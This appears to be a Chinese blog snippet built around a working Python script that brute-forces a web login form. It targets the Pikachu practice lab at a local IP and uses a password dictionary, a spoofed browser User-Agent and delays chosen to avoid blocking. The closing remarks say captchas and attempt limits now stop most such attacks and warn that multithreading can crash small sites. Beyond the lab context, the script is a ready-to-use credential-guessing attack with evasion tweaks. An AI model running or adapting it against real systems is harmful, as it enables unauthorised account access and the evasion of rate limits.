htmledit_views">

import requests
import time# 目标URL
url = "http://192.168.3.101/pikachu/vul/burteforce/bf_form.php"  # 请替换为实际的目标URL# 已知的用户名
username = "admin"# 密码字典文件路径
password_file = "passwords.txt"# 伪造请求头，避免被拦截
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}def login_attempt(username, password):session = requests.Session()response = session.get(url, headers=headers)# 构建表单数据data = {'username': username,'password': password,'submit': 'Login',}# 发送POST请求response = session.post(url, data=data, headers=headers)# 将返回的页面写入文件（调试用）with open('response.txt', 'w', encoding='utf-8') as f:f.write(response.text)# 检查是否登录成功if "login success" in response.text.lower():print(f"[+] Password found: {password}")return Trueelse:print(f"[-] Incorrect password: {password}")return False# 读取密码字典文件
with open(password_file, 'r', encoding='utf-8') as file:for password in file.readlines():password = password.strip()# 尝试登录if login_attempt(username, password):break# 适当延迟请求，避免被封time.sleep(1)

但是话说回来，这样的纯小子后台已经不多了，大部分加了验证码或者尝试登录次数的判定，所以也没什么用处

这个不建议改多线程，小网站的话真的会被扫崩掉，大网站也有封ip的风险